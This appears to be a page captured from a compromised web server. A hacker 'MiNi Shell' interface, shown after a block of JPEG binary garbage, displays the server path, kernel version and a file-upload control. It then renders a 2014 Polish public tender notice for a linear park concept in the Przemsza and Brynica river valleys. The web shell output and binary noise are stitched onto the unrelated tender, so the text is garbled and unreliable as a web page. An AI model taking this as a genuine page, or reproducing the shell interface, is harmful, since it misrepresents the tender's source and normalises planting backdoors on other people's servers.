JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140516/165348-N-2014.html

<p class="kh_header"><b>Dąbrowa Górnicza: Opracowanie dokumentów diagnostyczno- analitycznych i koncepcyjnych do przygotowania oraz kompleksowej realizacji Zagłębiowskiego Parku Linearnego obszaru funkcjonalnego doliny rzek 
Przemszy i Brynicy:Zadanie D. Dokumentacja dla Zagłębiowskiego Parku Linearnego obszaru funkcjonalnego doliny rzek Przemszy i Brynicy - opracowanie koncepcji urbanistyczno- architektonicznej
Zamówienie realizowane w ramach wdrażanego przez Ministerstwo Infrastruktury i Rozwoju Programu Regionalnego (...)ciąg dalszy nazwy zamówienia sekcja IV.4.16 ogłoszenia.</b><br>
<b>Numer ogłoszenia: 165348 - 2014; data zamieszczenia: 16.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentów diagnostyczno- analitycznych i koncepcyjnych do przygotowania oraz kompleksowej realizacji Zagłębiowskiego Parku Linearnego obszaru funkcjonalnego doliny rzek 
Przemszy i Brynicy:Zadanie D. Dokumentacja dla Zagłębiowskiego Parku Linearnego obszaru funkcjonalnego doliny rzek Przemszy i Brynicy - opracowanie koncepcji urbanistyczno- architektonicznej
Zamówienie realizowane w ramach wdrażanego przez Ministerstwo Infrastruktury i Rozwoju Programu Regionalnego (...)ciąg dalszy nazwy zamówienia sekcja IV.4.16 ogłoszenia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego o wartości zamówienia poniżej kwoty dla dostaw i usług określonej w przepisach wydanych na podstawie art. 11 ust. 8 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.). 2. Przedmiotem zamówienia jest opracowanie dokumentów koncepcyjnych i wykonawczych do przygotowania oraz kompleksowej realizacji Zagłębiowskiego Parku Linearnego obszaru funkcjonalnego doliny rzek Przemszy i Brynicy:
Zadanie D. Dokumentacja dla Zagłębiowskiego Parku Linearnego - opracowanie koncepcji urbanistyczno- architektonicznej
Przy realizacji przedmiotu zamówienia Wykonawca musi pamiętać o tym, że Projekt realizowany będzie w województwie śląskim, na obszarze funkcjonalnym Zagłębia Dąbrowskiego, które tworzy sześć gmin i jeden powiat:
-Gmina Dąbrowa Górnicza (Lider);
-Gmina Sosnowiec;
-Miasto Będzin; 
-Gmina Siewierz;
-Gmina Sławków;
-Gmina Psary;
-Powiat Będziński.
Istotą projektu jest wyznaczenie zielonego pasa (korytarza ekologicznego) przebiegającego dolinami dwóch rzek: Przemszy i Brynicy, które przepływają i łączą wszystkie 7 jednostek samorządu terytorialnego uczestniczących w projekcie. Przy czym pierwszym etapem realizacji projektu jest doprowadzenie do wyznaczenia tego korytarza, nadanie mu określonych funkcji oraz przygotowanie koncepcji Zagłębiowskiego Parku Linearnego.
Zagłębiowski Park Linearny oparty na osi kompozycyjnej rzek: Przemszy, Białej Przemszy oraz Brynicy, przewidywany jest jako szeroko rozumiany system rekreacyjny, który przenikać się będzie z innymi systemami aglomeracji tworząc szerszą sieć powiązań funkcjonalnych, przyrodniczych, społecznych i kulturowych. Park obejmować będzie cenne przyrodniczo tereny parków, dolin rzek i innych obiektów, zapewniając jednocześnie większą spójność terytorialną i społeczną. Komplementarna oferta programowa (różne atrakcje w różnych miejscach) zwiększy mobilność turystów 
i rozszerzy repertuar możliwości rekreacji dla mieszkańców. Komunikację wewnątrz Parku i jego spójność terytorialną zapewni szlak kajakowy rzekami: Przemszy, Białej Przemszy oraz system ścieżek pieszych oraz ścieżek i szlaków rowerowych wraz z niezbędną infrastrukturą. System parku linearnego docelowo ma się stać również narzędziem rewitalizacji położonych w pobliżu obszarów dysfunkcyjnych oraz elementem kompleksowej zmiany wizerunku Zagłębia na zewnątrz - z obszaru poprzemysłowego o zdegradowanym charakterze, w obszar atrakcyjny przyrodniczo i krajobrazowo, dbający o środowisko i szczycący się coraz lepszymi parametrami jakości środowiska, a w konsekwencji w miejsce atrakcyjne do lokowania inwestycji.
Elementy tworzące oś przyszłego Parku Linearnego zlokalizowane są wzdłuż Przemszy oraz jednego z jej dopływów - Brynicy i składają się na nią następujące obiekty:
-Park Zielona w Dąbrowie Górniczej;
-Park Miejski z Egzotarium w Sosnowcu;
-Park Rozkówka, Małpi Gaj i teren nadrzeczny Brzozowica w Będzinie;
-Teren przy Zamku oraz Park Miejski położony pomiędzy ul. Żwirki i Wigury, a Szpitalem Chorób Płuc 
w Siewierzu; 
-Tereny rekreacyjno-sportowe nad rzeką Białą Przemszą w Sławkowie;
-Park w Górze Siewierskiej w Gminie Psary.
I. Opracowanie koncepcji urbanistyczno-architektonicznej Zagłębiowskiego Parku Linearnego Doliny Przemszy 
i Brynicy wraz z propozycją rozwiązań programowo- przestrzennych. 
Celem Koncepcji urbanistyczno-architektonicznej jest przedstawienie propozycji rozwiązań programowo -przestrzennych dla Zagłębiowskiego Parku Linearnego obszaru funkcjonalnego doliny rzek Przemszy i Brynicy.
Podstawowe wymogi dot. zakresu opracowania:
1. Część analityczna obejmująca analizę przestrzenno-funkcjonalną i kompozycyjno-krajobrazową obszarów (w tym: określenie istniejących funkcji terenów objętych Parkiem Linearnym, określenie istniejącej infrastruktury na terenie nieruchomości objętych Parkiem Linearnym z uwzględnieniem możliwości jej rozbudowy i/lub adaptacji dla kompleksu: Zagłębiowski Park Linearny),
2.  Część projektowa wraz z wizualizacją opracowanych wariantów/rozwiązań.
Punktem wyjścia do opracowania Koncepcji Parku Linearnego Doliny Przemszy i Brynicy będą wnioski wynikające ze Strategii Obszaru Funkcjonalnego - Zielona Infrastruktura Zagłębia Dąbrowskiego, oraz z socjologicznego projektu badawczego, stanowiącego I etap konsultacji społecznych i obejmującego diagnozę społecznych uwarunkowań i oczekiwań mieszkańców, a także wytyczne przekazane przez partnerów uczestniczących w realizacji projektu (jst, organizacje pozarządowe, izba gospodarcza, uczelnia), z uwzględnieniem leśnego charakteru parku oraz zapisów obowiązującego miejscowego planu zagospodarowania przestrzennego.
Dokumenty Strategii Obszaru Funkcjonalnego - Zielona Infrastruktura Zagłębia Dąbrowskiego oraz socjologiczny projekt badawczy Zamawiający przekaże Wykonawcy po zakończeniu ich realizacji i odebraniu dokumentów.
Koncepcja uwzględniać ma, zatem wnioski dotyczące terenów rekomendowanych do objęcia terytorium Parku Linearnego w koncepcji Zielonej Infrastruktury, jak i wnioski dotyczące potencjalnych działań w danej przestrzeni publicznej, zawarte w raporcie końcowym socjologicznego projektu badawczego. 
Wykonawca zobowiązany jest do przygotowania, co najmniej 2 koncepcji, które poddane zostaną konsultacjom społecznym, a także wprowadzania korekt zgodnie z wypracowanymi podczas konsultacji rozwiązaniami.
Ostateczny kształt koncepcji będzie wynikiem uzgodnień dokonanych podczas spotkań w ramach tzw. II etapu konsultacji społecznych - opisane jako Zadanie B. Konsultacje społeczne II - Przygotowanie, organizacja i przeprowadzenie debat konsultacyjnych z mieszkańcami wraz z opracowaniem raportu końcowego (w tym life planning, spotkania, hapenningi), a także dyżurów zorganizowanych przez Wykonawcę na rzecz pozyskania dodatkowych sugestii i opinii, podczas których mieszkańcy będą mieli możliwość bezpośredniego, indywidualnego kontaktu z projektantami w planowanej do zagospodarowania przestrzeni. 
Uzgodnienia dokonane podczas spotkań ramach tzw. II etapu konsultacji społecznych Zamawiający przekaże Wykonawcy po ich zakończeniu i odebraniu dokumentów.
Miejsca i terminy dyżurów projektantów zostaną ustalone w trakcie realizacji projektu po podpisaniu umowy z Wykonawcą, jednak nie będą to miejsca z poza Partnerstwa Gmin Zagłębia Dąbrowskiego.
Przygotowanie opracowania podzielone zostanie na dwa etapy:
Etap I: przygotowanie wstępnej, wariantowej koncepcji urbanistyczno-architektonicznej możliwości zagospodarowania obszaru, które poddane zostaną pod dyskusję podczas konsultacji społecznych określonych jako Zadanie B. Konsultacje społeczne (wraz ze wskazaniem niezbędnych działań i szacunkowych kosztów dla każdego ze wskazanych kierunków). Dokumenty będą stanowić niezbędną pomoc w podjęciu decyzji dotyczącej wyboru wariantu zagospodarowania terenu. 
Etap II: opracowanie koncepcji szczegółowej dla wybranego wariantu, tj. koncepcji programowo-przestrzennej, uwzględniającej charakter i specyfikę miejsca i wymogi miejscowego planu zagospodarowania przestrzennego (strefa ochrony konserwatorskiej), w tym ochrony starodrzewu, obejmującej zagospodarowanie, urządzenie i uzbrojenie terenu w celu wykorzystania powierzchni obszaru, w tym ocenę stanu istniejącej infrastruktury technicznej. Wykonawca ma obowiązek uzupełnić opracowanie o dokumentację fotograficzną oraz wizualizację koncepcji zagospodarowania terenu. Koncepcja powinna zostać opracowana z zachowaniem dbałości o środowisko i obszary cenne przyrodniczo.
Zakres prac w ramach opracowania koncepcji obejmować będzie w szczególności wykonanie:
Etap I: 
1. wstępnej koncepcji urbanistyczno-architektonicznej przedstawiającej minimum 2 wersje wariantowe założeń koncepcyjnych (z uwzględnieniem ustaleń obowiązującego miejscowego planu zagospodarowania przestrzennego, uzbrojenia terenu w media oraz z przystosowaniem do potrzeb osób niepełnosprawnych) z podanymi planowanymi parametrami zabudowy oraz, bilansem terenów (powierzchnie użytkowe, powierzchnie zabudowy, powierzchnie dróg, ilość miejsc postojowych, szacunkowe zapotrzebowanie mediów) woda, gaz/ciepło, energia elektryczna, kanalizacja sanitarna, kanalizacja deszczowa, telekomunikacja, sieć kablowa i Internet;
2. projektu koncepcyjnego układu komunikacyjnego (w tym wytyczenie nowych ścieżek pieszych, rowerowych i edukacyjnych, nowych miejsc postojowych) powiązanego z zewnętrznym układem komunikacyjnym (wraz z bilansem terenów) ;
3. projektu koncepcyjnego zieleni wskazującego, na ewentualne nowe formy zagospodarowania zieleni (nowe nasadzenia);
3.1. inwentaryzacji zieleni (w tym zieleni chronionej) wraz z bilansem terenów zielonych wg stanu istniejącego i po zrealizowaniu założeń projektowych; 
4. wstępne zestawienie kosztów realizacji inwestycji z uwzględnieniem kosztów niezbędnych do poniesienia przy koniecznych zabiegach sanitarno-porządkowych m.in. cieków wodnych i stawu (winno zawierać wstępny zbiór wszystkich kosztów przewidzianych do realizacji inwestycji);
5. wstępnej analizy kosztowej uzbrojenia;
6. wizualizacji poszczególnych rozwiązań architektonicznych oraz wizualizacji koncepcji zagospodarowania terenu, ilustrującej część opisową;
7. dokumentacji fotograficznej ilustrującej część opisową;	
8. wersji cyfrowej materiałów w formacie PDF, jpg, ilustrujących część opisową;
9. zwięzłej informacji o przedstawionej koncepcji, będącej streszczeniem całego opracowania, zawierającej podstawowe idee pracy oraz jej syntetyczne wyniki (do 5 stron);
Każda koncepcja winna być opracowana zgodnie z obowiązującymi przepisami ustaw związanymi z problematyką opracowania.
Zamawiający zastrzega sobie możliwość wpływu na treść zapisów i sposób kształtowania koncepcji (w zakresie nienaruszającym obowiązujących przepisów), w celu zapewnienia możliwości realizacji zamierzeń gmin. 
Nakład: komplet wszystkich dokumentów wytworzonych w ramach realizacji Etapu I (pkt 1-9) musi zostać przekazany tylko w formie elektronicznej na 8 (ośmiu) płytach CD/DVD. 
Termin dostarczenia płyt do siedziby Zamawiającego: nie później niż do dnia 30.09.2014r. 
Etap II: będzie rozwinięciem i uszczegółowieniem koncepcji urbanistyczno-architektonicznej z propozycją rozwiązań programowo-przestrzennych wybranego wariantu z etapu I, które musi składać się z części opisowej i graficznej, która dodatkowo winna zawierać w szczególności:
1. koncepcję zagospodarowania terenu wykonaną na aktualnej kopii mapy zasadniczej z nakładką ewidencyjną, z uwzględnieniem ustaleń obowiązującego miejscowego planu zagospodarowania przestrzennego, uzbrojenia terenu w media oraz z przystosowaniem do potrzeb osób niepełnosprawnych) z podanymi planowanymi parametrami zabudowy oraz bilansem terenów (m.in. powierzchnie użytkowe, powierzchnie zabudowy, powierzchnie dróg, ilość miejsc postojowych). W przypadku braku miejscowego planu zagospodarowania przestrzennego koncepcja powinna uwzględniać ustalenia aktualnego Studium uwarunkowań i kierunków zagospodarowania przestrzennego dla danego obszaru;
2. proponowane rozwiązania wraz z infrastrukturą towarzyszącą w obrębie rzek Przemszy i Brynicy, która powinna uwzględniać wahania poziomu wody, wezbrania powodziowe i tym samym zalewanie terenów przybrzeżnych i która powinna być odpowiednio dobrana do przewidywanych warunków hydrologicznych;
3. koncepcję układu komunikacyjnego (w tym wytyczenie nowych ścieżek pieszych, rowerowych i edukacyjnych, miejsc postojowych) powiązanego z zewnętrznym układem komunikacyjnym (wraz bilansem terenów);
4. koncepcję zieleni wskazującą, na ewentualne nowe formy zagospodarowania zieleni (nowe nasadzenia);
5. zestawienia kosztów realizacji inwestycji z uwzględnieniem kosztów niezbędnych do poniesienia przy koniecznych zabiegach sanitarno-porządkowych m.in. cieków wodnych i stawu (winno zawierać wstępny zbiór wszystkich kosztów przewidzianych do realizacji inwestycji w 2 wariantach - droższym i tańszym)
6. wizualizacje poszczególnych rozwiązań architektonicznych oraz wizualizacji koncepcji zagospodarowania terenu, ilustrującej część opisową;
7. dokumentację fotograficzną ilustrującą część opisową;
8. wersję cyfrową materiałów w formacie PDF, jpg, ilustrujących część opisową;
9. zwięzłą informację o przedstawionej koncepcji, będącą streszczeniem całego opracowania, zawierającą podstawowe idee pracy oraz jej syntetyczne wyniki (do 5 stron);
W ramach zamówienia Wykonawca zobowiązany jest do uczestnictwa w naradach z Zamawiającym, w terminach uzgodnionych z Zamawiającym oraz przedstawiania kolejnych etapów prac.
Każda koncepcja winna być opracowana zgodnie z obowiązującymi przepisami ustaw związanymi z problematyką opracowania.
Zamawiający zastrzega sobie możliwość wpływu na treść zapisów i sposób kształtowania koncepcji (w zakresie nienaruszającym obowiązujących przepisów), w celu zapewnienia możliwości realizacji zamierzeń gmin. 
Nakład: koncepcję należy sporządzić w nakładzie 8 kpl.
Komplet dokumentacji tworzą: część opisowa w wersji drukowanej, wizualizacje przedstawione na planszach oraz zapis wszystkich elementów dokumentacji (pkt. 1-9 oraz wizualizacje na planszach) w wersji elektronicznej (płyta CD/DVD). 
Część opisowa musi być sporządzona w formacie stron A4, z tekstem w kroju Calibri 11 pkt z odstępem między wierszami 1,15. Raporty w formie elektronicznej winny być przekazane Zamawiającemu na płytach CD/DVD w formie plików w formacie *xls, *jpg, *doc obsługiwanych przez Word 2000 bądź równoważny oraz *pdf zabezpieczonych przed zmianami i umożliwiających przesłanie opracowania drogą elektroniczną wraz 
z wizualizacjami ilustrującymi część opisową raportu końcowego. Forma graficzna winna być przedstawiona na mapach w technice barwnej, zapewniającej czytelność koncepcji. Konwencja przedstawienia graficznego pozostawiona jest ich autorom. Część graficzna powinna być wykonana na lekkich, sztywnych planszach o wymiarach: 100cm x 70cm. Ilość plansz dowolna, zapewniająca właściwe odczytanie koncepcji autorskiej. Technika opracowania dowolna, umożliwiająca reprodukcję czarno-białą. 
7 kompletów zawierać będzie m.in. 1 planszę ilustrującą rozwiązania dla całego obszaru funkcjonalnego oraz min. 1 planszę z ilustrującą rozwiązania dla poszczególnych obszarów tworzących Park Linearny, tak aby każdy z partnerów projektu otrzymał min. 1 planszę prezentującą kompleksowo Zagłębiowski Park Linearny obszar funkcjonalny doliny rzek Przemszy i Brynicy oraz min. 1 planszę z uszczegółowieniem koncepcji dla obszaru wniesionego do Parku Linearnego Zagłębia Dąbrowskiego.
Termin dostarczenia kompletnej dokumentacji wytworzonej w ramach realizacji Etapu II do siedziby Zamawiającego: nie później niż do dnia 30.11.2014r.
UWAGI DODATKOWE:
1. Informacje o dokumencie Strategii Obszaru Funkcjonalnego- Zielona Infrastruktura Zagłębia Dąbrowskiego oraz o Zadaniu B. Konsultacje społeczne znajdują się w Biuletynie Informacji Publicznej Urzędu Miejskiego w Dąbrowie Górniczej w zakładce zamówienia publiczne pod nr ZP.WIM.271.4.29.2014
2. Koncepcja urbanistyczno- architektoniczna musi być oznakowana zgodnie z założeniami kreacyjnymi Systemu Identyfikacji Wizualnej, wytworzonym na potrzeby Projektu oraz zgodna z Podręcznikiem Komunikacji i Identyfikacji Wizualnej dla Projektów dofinansowanych z Mechanizmu Finansowego EOG na lata 2009-2014, który znajduje się pod linkiem:
http://www.eog.gov.pl/Dokumenty/Informacja_i_promocja/Documents/Wytyczn_Podrecznik_wizualizacji.pdf
oraz zawierać nazwę projektu wraz z informacją o dofinansowaniu ze środków Mechanizmu Finansowego EOG i środków krajowych na lata 2009-2014..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.42.00.00-8, 73.20.00.00-4, 79.81.00.00-5, 39.29.41.00-0, 79.82.25.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od
Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia
szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie
warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art.
22 ust. 1 ustawy (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  należycie co najmniej dwie usługi polegające na sporządzeniu projektu lub koncepcji urbanistyczno-architektonicznej zagospodarowania terenów zielonych o powierzchni min. 5 ha każda.

POPRZEZ TEREN ZIELONY ZAMAWIAJĄCY ROZUMIE ogólnodostępne tereny wraz z infrastrukturą techniczną 
i budynkami funkcjonalnie z nimi związanymi, pokryte roślinnością niską i wysoką, w tym obejmujące tereny nadbrzeżne cieków i zbiorników wodnych, parki, parki rekreacyjno- sportowe, zieleńce, promenady, ogrody jordanowskie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia
szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie
warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art.
22 ust. 1 ustawy (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:   
- minimum 1 osobą posiadająca uprawnienia architektoniczne zgodnie z wymaganiami ustawy z dnia 15 grudnia 2000 r. 
o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U z 2001 r. Nr 5 poz. 42 z późn. zm.), lub odpowiadające im uprawnienia, która pracowała nad sporządzeniem dwóch projektów lub koncepcji urbanistyczno-architektonicznych zagospodarowania terenów zielonych. Wartość każdego z projektów minimum 60 000 zł brutto),
- minimum 1 osobą, która ukończyła kierunek architektura krajobrazu, i która pracowała nad sporządzeniem minimum dwóch projektów lub koncepcji urbanistyczno-architektonicznych zagospodarowania terenów zielonych. Wartość każdego z projektów minimum 60 000 zł brutto),
- minimum 1 osobą posiadająca uprawnienia urbanistyczne zgodnie z wymaganiami ustawy z dnia 15 grudnia 2000 r. 
o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U z 2001 r. Nr 5 poz. 42 z późn. zm.), lub odpowiadające im uprawnienia, która pracowała nad sporządzeniem dwóch projektów lub koncepcji urbanistyczno-architektonicznych zagospodarowania terenów zielonych. Wartość każdego z projektów minimum 60 000 zł brutto).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia
szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnianie
warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art.
22 ust. 1 ustawy (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy
usług pozwalających wykazać, iż Wykonawca spełnia warunek określony w sekcji
III.3.2) ogłoszenia o zamówieniu. W wykazie nie należy podawać informacji o usługach
niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności
Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 ustawy
Pzp (zdanie 2).;;</li>

